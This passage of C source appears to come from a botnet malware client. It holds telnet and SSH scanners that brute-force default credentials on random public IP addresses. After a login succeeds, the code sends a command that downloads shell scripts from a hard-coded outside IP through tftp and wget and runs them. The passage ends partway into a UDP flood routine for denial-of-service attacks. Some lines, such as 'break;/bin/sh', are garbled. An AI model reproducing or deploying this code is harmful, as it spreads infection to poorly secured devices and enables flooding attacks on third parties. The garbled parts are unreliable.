				break;
908

909
			case 2:
910
				{
911
					if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
912

913
					if(readUntil(fds[i].fd, "ogin", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
914
					{
915
												fds[i].totalTimeout = 0;
916
												fds[i].bufUsed = 0;
917
												if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5;
918
												else fds[i].state = 3;
919
												memset(fds[i].sockbuf, 0, 1024);
920
											    continue;
921
					}
922
					else if(readUntil(fds[i].fd, "user", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
923
                                        {
924
                                                fds[i].totalTimeout = 0;
925
                                                fds[i].bufUsed = 0;
926
												if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5;
927
												else fds[i].state = 3;
928
                                                memset(fds[i].sockbuf, 0, 1024); 
929
                                                fds[i].state = 3;
930
                                                continue;
931
                                        }
932
					else if(readUntil(fds[i].fd, "pass", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
933
                                        {
934
                                                fds[i].totalTimeout = 0;
935
                                                fds[i].bufUsed = 0;
936
                                                memset(fds[i].sockbuf, 0, 1024); 
937
                                                fds[i].state = 5;
938
                                                continue;
939
                                        }
940
					else if(readUntil(fds[i].fd, "name", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
941
                                        {
942
                                                fds[i].totalTimeout = 0;
943
                                                fds[i].bufUsed = 0;
944
												if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5;
945
												else fds[i].state = 3;
946
                                                memset(fds[i].sockbuf, 0, 1024); 
947
                                                fds[i].state = 3;
948
                                                continue;
949
                                        }
950
					else if(readUntil(fds[i].fd, "word", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
951
                                        {
952
                                                fds[i].totalTimeout = 0;
953
                                                fds[i].bufUsed = 0;
954
                                                memset(fds[i].sockbuf, 0, 1024);
955
                                                fds[i].state = 5;
956
                                                continue;
957
                                        } else {
958
						fds[i].bufUsed = strlen(fds[i].sockbuf);
959
					}
960

961
					if(fds[i].totalTimeout + 10 < time(NULL))
962
					{
963
						sclose(fds[i].fd);
964
						fds[i].state = 0;
965
						fds[i].complete = 1;
966
					}
967
				}
968
				break;
969

970
			case 3:
971
				{
972
					if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
973
					if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
974
					fds[i].state = 4;
975
				}
976
				break;
977

978
			case 4:
979
				{
980
					if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
981

982
					if(readUntil(fds[i].fd, "pass", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
983
					{
984
						fds[i].totalTimeout = 0;
985
						fds[i].bufUsed = 0;
986
						if(strstr(fds[i].sockbuf, "pass") != NULL) fds[i].state = 5;
987
						else fds[i].state = 7;
988
						memset(fds[i].sockbuf, 0, 1024);
989
						continue;
990
					}
991
					else if(readUntil(fds[i].fd, "word", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
992
                                        {
993
                                                fds[i].totalTimeout = 0;
994
                                                fds[i].bufUsed = 0;
995
                                                if(strstr(fds[i].sockbuf, "word") != NULL) fds[i].state = 5;
996
                                                else fds[i].state = 7;
997
                                                memset(fds[i].sockbuf, 0, 1024);
998
                                                continue;
999
                                        } else {
1000
						if(strstr(fds[i].sockbuf, "invalid") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1001
						else if(strstr(fds[i].sockbuf, "incorrect") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1002
						else if(strstr(fds[i].sockbuf, "fail") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1003
						else if(strstr(fds[i].sockbuf, "again") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1004
						else if(strstr(fds[i].sockbuf, "wrong") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1005
						else if(strstr(fds[i].sockbuf, "accessdenied") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1006
						else if(strstr(fds[i].sockbuf, "error") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1007
						else if(strstr(fds[i].sockbuf, "bad") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1008
						fds[i].bufUsed = strlen(fds[i].sockbuf);
1009
					}
1010

1011
					if(fds[i].totalTimeout + 10 < time(NULL))
1012
					{
1013
						sclose(fds[i].fd);
1014
						fds[i].state = 0;
1015
						fds[i].complete = 1;
1016
					}
1017
				}
1018
				break;
1019

1020
			case 5:
1021
				{
1022
					if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1023
					if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1024
					fds[i].state = 6;
1025
				}
1026
				break;
1027

1028
			case 6:
1029
				{
1030
					if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
1031

1032
					if(readUntil(fds[i].fd, "invalid", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1033
					{
1034
						fds[i].totalTimeout = 0;
1035
						fds[i].bufUsed = 0;
1036
						if(strstr(fds[i].sockbuf, "invalid") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1037
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1038
						else fds[i].state = 7;
1039
						memset(fds[i].sockbuf, 0, 1024);
1040
						continue;
1041
					}
1042
					else if(readUntil(fds[i].fd, "incorrect", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1043
					{
1044
						fds[i].totalTimeout = 0;
1045
						fds[i].bufUsed = 0;
1046
						if(strstr(fds[i].sockbuf, "incorrect") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1047
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1048
						else fds[i].state = 7;
1049
						memset(fds[i].sockbuf, 0, 1024);
1050
						continue;
1051
					}
1052
					else if(readUntil(fds[i].fd, "fail", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1053
					{
1054
						fds[i].totalTimeout = 0;
1055
						fds[i].bufUsed = 0;
1056
						if(strstr(fds[i].sockbuf, "fail") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1057
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1058
						else fds[i].state = 7;
1059
						memset(fds[i].sockbuf, 0, 1024);
1060
						continue;
1061
					}
1062
					else if(readUntil(fds[i].fd, "again", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1063
					{
1064
						fds[i].totalTimeout = 0;
1065
						fds[i].bufUsed = 0;
1066
						if(strstr(fds[i].sockbuf, "again") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1067
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1068
						else fds[i].state = 7;
1069
						memset(fds[i].sockbuf, 0, 1024);
1070
						continue;
1071
					}
1072
					else if(readUntil(fds[i].fd, "wrong", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1073
					{
1074
						fds[i].totalTimeout = 0;
1075
						fds[i].bufUsed = 0;
1076
						if(strstr(fds[i].sockbuf, "wrong") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1077
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1078
						else fds[i].state = 7;
1079
						memset(fds[i].sockbuf, 0, 1024);
1080
						continue;
1081
					}
1082
					else if(readUntil(fds[i].fd, "accessdenied", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1083
					{
1084
						fds[i].totalTimeout = 0;
1085
						fds[i].bufUsed = 0;
1086
						if(strstr(fds[i].sockbuf, "accessdenied") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1087
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1088
						else fds[i].state = 7;
1089
						memset(fds[i].sockbuf, 0, 1024);
1090
						continue;
1091
					}
1092
					else if(readUntil(fds[i].fd, "error", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1093
					{
1094
						fds[i].totalTimeout = 0;
1095
						fds[i].bufUsed = 0;
1096
						if(strstr(fds[i].sockbuf, "error") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1097
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1098
						else fds[i].state = 7;
1099
						memset(fds[i].sockbuf, 0, 1024);
1100
						continue;
1101
					}
1102
					else if(readUntil(fds[i].fd, "bad", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1103
					{
1104
						fds[i].totalTimeout = 0;
1105
						fds[i].bufUsed = 0;
1106
						if(strstr(fds[i].sockbuf, "bad") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1107
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1108
						else fds[i].state = 7;
1109
						memset(fds[i].sockbuf, 0, 1024);
1110
						continue;
1111
					} else {
1112
						fds[i].bufUsed = strlen(fds[i].sockbuf);
1113
					}
1114

1115
					if(fds[i].totalTimeout + 10 < time(NULL))
1116
					{
1117
						sclose(fds[i].fd);
1118
						fds[i].state = 0;
1119
						fds[i].complete = 1;
1120
					}
1121
				}
1122
				break;
1123

1124
			case 7:
1125
				{
1126
					if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1127
					fds[i].state = 8;
1128
				}
1129
				break;
1130
			
1131
			case 8:
1132
				{
1133
					if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
1134
                    
1135
					if(send(fds[i].fd, "cd /tmp || cd /var/run;rm -f ng.sh gchq.sh;tftp -r ng.sh -g 94.140.120.196;chmod +x ng.sh;sh ng.sh;rm -f ng.sh;wget -q http://94.140.120.196/gchq.sh;chmod +x gchq.sh;sh gchq.sh;rm -f gchq.sh\r\n", 194, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; memset(fds[i].sockbuf, 0, 1024); continue; }
1136
					
1137
					if(fds[i].totalTimeout + 10 < time(NULL))
1138
					{
1139
						sclose(fds[i].fd);
1140
						fds[i].state = 0;
1141
						fds[i].complete = 1;
1142
					}
1143
				}
1144
				break;
1145
			}
1146
		}
1147
	}
1148
}
1149

1150
//      __________ __  __   _____ _________    _   __
1151
//     / ___/ ___// / / /  / ___// ____/   |  / | / /
1152
//     \__ \\__ \/ /_/ /   \__ \/ /   / /| | /  |/ /
1153
//    ___/ /__/ / __  /   ___/ / /___/ ___ |/ /|  /
1154
//   /____/____/_/ /_/   /____/\____/_/  |_/_/ |_/
1155

1156
void secureShellScan()
1157
{
1158
	int max = (getdtablesize() / 4) * 3, i, res;
1159
	fd_set myset;
1160
	struct timeval tv;
1161
	socklen_t lon;
1162
	int valopt;
1163

1164
	max = max > 512 ? 512 : max;
1165

1166
	struct sockaddr_in dest_addr;
1167
	dest_addr.sin_family = AF_INET;
1168
	dest_addr.sin_port = htons(22);
1169
	memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1170

1171
	struct telstate_t
1172
	{
1173
		int fd;
1174
		uint32_t ip;
1175
		uint8_t state;
1176
		uint8_t complete;
1177
		uint8_t usernameInd;
1178
		uint8_t passwordInd;
1179
		uint32_t totalTimeout;
1180
		uint16_t bufUsed;
1181
		char *sockbuf;
1182
	} fds[max];
1183
	memset(fds, 0, max * (sizeof(int) + 1));
1184
	for(i = 0; i < max; i++) { fds[i].complete = 1; fds[i].sockbuf = malloc(1024); memset(fds[i].sockbuf, 0, 1024); }
1185
	struct timeval timeout;
1186
        timeout.tv_sec = 8;
1187
        timeout.tv_usec = 0;
1188
	while(1)
1189
	{
1190
		for(i = 0; i < max; i++)
1191
		{
1192
			switch(fds[i].state)
1193
			{
1194
			case 0:
1195
				{
1196
					memset(fds[i].sockbuf, 0, 1024);
1197

1198
					if(fds[i].complete) { char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; fds[i].ip = getRandomPublicIP(); }
1199
					else {
1200
						fds[i].passwordInd++;
1201
						if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].passwordInd = 0; fds[i].usernameInd++; }
1202
						if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; }
1203
					}
1204
					dest_addr.sin_family = AF_INET;
1205
					dest_addr.sin_port = htons(22);
1206
					memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1207
					dest_addr.sin_addr.s_addr = fds[i].ip;
1208
					fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1209
					if(fds[i].fd == -1) { continue; }
1210
					fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1211
					if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { sclose(fds[i].fd); fds[i].complete = 1; }
1212
					else { fds[i].state = 1; fds[i].totalTimeout = 0; }
1213
				}
1214
				break;
1215

1216
			case 1:
1217
				{
1218
					if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
1219

1220
					FD_ZERO(&myset);
1221
					FD_SET(fds[i].fd, &myset);
1222
					tv.tv_sec = 0;
1223
					tv.tv_usec = 10000;
1224
					res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
1225
					if(res == 1)
1226
					{
1227
						lon = sizeof(int);
1228
						valopt = 0;
1229
						getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1230
						if(valopt)
1231
						{
1232
							sclose(fds[i].fd);
1233
							fds[i].state = 0;
1234
							fds[i].complete = 1;
1235
						} else {
1236
							fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
1237
							fds[i].totalTimeout = 0;
1238
							fds[i].bufUsed = 0;
1239
							memset(fds[i].sockbuf, 0, 1024);
1240
							fds[i].state = 2;
1241
							continue;
1242
						}
1243
					} else if(res == -1)
1244
					{
1245
						sclose(fds[i].fd);
1246
						fds[i].state = 0;
1247
						fds[i].complete = 1;
1248
					}
1249

1250
					if(fds[i].totalTimeout + 10 < time(NULL))
1251
					{
1252
						sclose(fds[i].fd);
1253
						fds[i].state = 0;
1254
						fds[i].complete = 1;
1255
					}
1256
				}
1257
				break;
1258

1259
			case 2:
1260
				{
1261
					if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
1262

1263
					if(readUntil(fds[i].fd, "ogin", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1264
					{
1265
												fds[i].totalTimeout = 0;
1266
												fds[i].bufUsed = 0;
1267
												if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5;
1268
												else fds[i].state = 3;
1269
												memset(fds[i].sockbuf, 0, 1024);
1270
											    continue;
1271
					}
1272
					else if(readUntil(fds[i].fd, "as", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1273
                                        {
1274
                                                fds[i].totalTimeout = 0;
1275
                                                fds[i].bufUsed = 0;
1276
												if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5;
1277
												else fds[i].state = 3;
1278
                                                memset(fds[i].sockbuf, 0, 1024); 
1279
                                                fds[i].state = 3;
1280
                                                continue;
1281
                                        } else {
1282
						fds[i].bufUsed = strlen(fds[i].sockbuf);
1283
					}
1284

1285
					if(fds[i].totalTimeout + 10 < time(NULL))
1286
					{
1287
						sclose(fds[i].fd);
1288
						fds[i].state = 0;
1289
						fds[i].complete = 1;
1290
					}
1291
				}
1292
				break;
1293

1294
			case 3:
1295
				{
1296
					if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1297
					if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1298
					fds[i].state = 4;
1299
				}
1300
				break;
1301

1302
			case 4:
1303
				{
1304
					if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
1305

1306
					if(readUntil(fds[i].fd, "pass", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1307
					{
1308
						fds[i].totalTimeout = 0;
1309
						fds[i].bufUsed = 0;
1310
						if(strstr(fds[i].sockbuf, "pass") != NULL) fds[i].state = 5;
1311
						else fds[i].state = 7;
1312
						memset(fds[i].sockbuf, 0, 1024);
1313
						continue;
1314
					}
1315
					else if(readUntil(fds[i].fd, "word", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1316
                    {
1317
                        fds[i].totalTimeout = 0;
1318
                        fds[i].bufUsed = 0;
1319
                        if(strstr(fds[i].sockbuf, "word") != NULL) fds[i].state = 5;
1320
                        else fds[i].state = 7;
1321
                        memset(fds[i].sockbuf, 0, 1024);
1322
                        continue;
1323
                    } else {
1324
						if(strstr(fds[i].sockbuf, "invalid") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1325
						else if(strstr(fds[i].sockbuf, "incorrect") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1326
						else if(strstr(fds[i].sockbuf, "fail") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1327
						else if(strstr(fds[i].sockbuf, "again") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1328
						else if(strstr(fds[i].sockbuf, "wrong") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1329
						else if(strstr(fds[i].sockbuf, "accessdenied") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1330
						else if(strstr(fds[i].sockbuf, "error") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1331
						else if(strstr(fds[i].sockbuf, "bad") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1332
						fds[i].bufUsed = strlen(fds[i].sockbuf);
1333
					}
1334

1335
					if(fds[i].totalTimeout + 10 < time(NULL))
1336
					{
1337
						sclose(fds[i].fd);
1338
						fds[i].state = 0;
1339
						fds[i].complete = 1;
1340
					}
1341
				}
1342
				break;
1343

1344
			case 5:
1345
				{
1346
					if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1347
					if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1348
					fds[i].state = 6;
1349
				}
1350
				break;
1351

1352
			case 6:
1353
				{
1354
					if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
1355

1356
					if(readUntil(fds[i].fd, "invalid", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1357
					{
1358
						fds[i].totalTimeout = 0;
1359
						fds[i].bufUsed = 0;
1360
						if(strstr(fds[i].sockbuf, "invalid") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1361
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1362
						else fds[i].state = 7;
1363
						memset(fds[i].sockbuf, 0, 1024);
1364
						continue;
1365
					}
1366
					else if(readUntil(fds[i].fd, "incorrect", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1367
					{
1368
						fds[i].totalTimeout = 0;
1369
						fds[i].bufUsed = 0;
1370
						if(strstr(fds[i].sockbuf, "incorrect") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1371
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1372
						else fds[i].state = 7;
1373
						memset(fds[i].sockbuf, 0, 1024);
1374
						continue;
1375
					}
1376
					else if(readUntil(fds[i].fd, "fail", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1377
					{
1378
						fds[i].totalTimeout = 0;
1379
						fds[i].bufUsed = 0;
1380
						if(strstr(fds[i].sockbuf, "fail") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1381
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1382
						else fds[i].state = 7;
1383
						memset(fds[i].sockbuf, 0, 1024);
1384
						continue;
1385
					}
1386
					else if(readUntil(fds[i].fd, "again", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1387
					{
1388
						fds[i].totalTimeout = 0;
1389
						fds[i].bufUsed = 0;
1390
						if(strstr(fds[i].sockbuf, "again") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1391
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1392
						else fds[i].state = 7;
1393
						memset(fds[i].sockbuf, 0, 1024);
1394
						continue;
1395
					}
1396
					else if(readUntil(fds[i].fd, "wrong", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1397
					{
1398
						fds[i].totalTimeout = 0;
1399
						fds[i].bufUsed = 0;
1400
						if(strstr(fds[i].sockbuf, "wrong") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1401
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1402
						else fds[i].state = 7;
1403
						memset(fds[i].sockbuf, 0, 1024);
1404
						continue;
1405
					}
1406
					else if(readUntil(fds[i].fd, "accessdenied", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1407
					{
1408
						fds[i].totalTimeout = 0;
1409
						fds[i].bufUsed = 0;
1410
						if(strstr(fds[i].sockbuf, "accessdenied") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1411
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1412
						else fds[i].state = 7;
1413
						memset(fds[i].sockbuf, 0, 1024);
1414
						continue;
1415
					}
1416
					else if(readUntil(fds[i].fd, "error", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1417
					{
1418
						fds[i].totalTimeout = 0;
1419
						fds[i].bufUsed = 0;
1420
						if(strstr(fds[i].sockbuf, "error") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1421
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1422
						else fds[i].state = 7;
1423
						memset(fds[i].sockbuf, 0, 1024);
1424
						continue;
1425
					}
1426
					else if(readUntil(fds[i].fd, "bad", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1427
					{
1428
						fds[i].totalTimeout = 0;
1429
						fds[i].bufUsed = 0;
1430
						if(strstr(fds[i].sockbuf, "bad") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
1431
	 					if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1432
						else fds[i].state = 7;
1433
						memset(fds[i].sockbuf, 0, 1024);
1434
						continue;
1435
					} else {
1436
						fds[i].bufUsed = strlen(fds[i].sockbuf);
1437
					}
1438

1439
					if(fds[i].totalTimeout + 10 < time(NULL))
1440
					{
1441
						sclose(fds[i].fd);
1442
						fds[i].state = 0;
1443
						fds[i].complete = 1;
1444
					}
1445
				}
1446
				break;/bin/sh
1447

1448
			case 7:
1449
				{
1450
					if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1451
					fds[i].state = 8;
1452
				}
1453
				break;
1454

1455
			case 8:
1456
				{
1457
					if(send(fds[i].fd, "/bin/sh\r\n", 9, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1458
					fds[i].state = 9;
1459
				}
1460
				break;
1461
			
1462
			case 9:
1463
				{
1464
					if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
1465
                    
1466
					if(send(fds[i].fd, "shell exec\r\n", 194, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; memset(fds[i].sockbuf, 0, 1024); continue; }
1467
					
1468
					if(fds[i].totalTimeout + 10 < time(NULL))
1469
					{
1470
						sclose(fds[i].fd);
1471
						fds[i].state = 0;
1472
						fds[i].complete = 1;
1473
					}
1474
				}
1475
				break;
1476
			}
1477
		}
1478
	}
1479
}
1480

1481
//      __  ______  ____     ________    ____  ____  ____
1482
//     / / / / __ \/ __ \   / ____/ /   / __ \/ __ \/ __ \
1483
//    / / / / / / / /_/ /  / /_  / /   / / / / / / / / / /
1484
//   / /_/ / /_/ / ____/  / __/ / /___/ /_/ / /_/ / /_/ /
1485
//   \____/_____/_/      /_/   /_____/\____/\____/_____/
1486

1487
void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval)
1488
{
1489
	struct sockaddr_in dest_addr;
1490

1491
	dest_addr.sin_family = AF_INET;
1492
	if(port == 0) dest_addr.sin_port = rand_cmwc();
1493
	else dest_addr.sin_port = htons(port);
1494
	if(getHost(target, &dest_addr.sin_addr)) return;
1495
	memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1496

1497
	register unsigned int pollRegister;
1498
	pollRegister = pollinterval;
1499

1500
	if(spoofit == 32)
1501
	{
1502
		int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
1503
		if(!sockfd)
1504
		{
1505
			sockprintf(mainCommSock, "Failed opening raw socket.");
1506
			return;
1507
		}
1508

1509
		unsigned char *buf = (unsigned char *)malloc(packetsize + 1);
1510
		if(buf == NULL) return;
1511
		memset(buf, 0, packetsize + 1);
1512
		makeRandomStr(buf, packetsize);
1513

1514
		int end = time(NULL) + timeEnd;
1515
		register unsigned int i = 0;
1516
		while(1)
1517
		{
1518
			sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1519

1520
			if(i == pollRegister)
1521
			{
1522
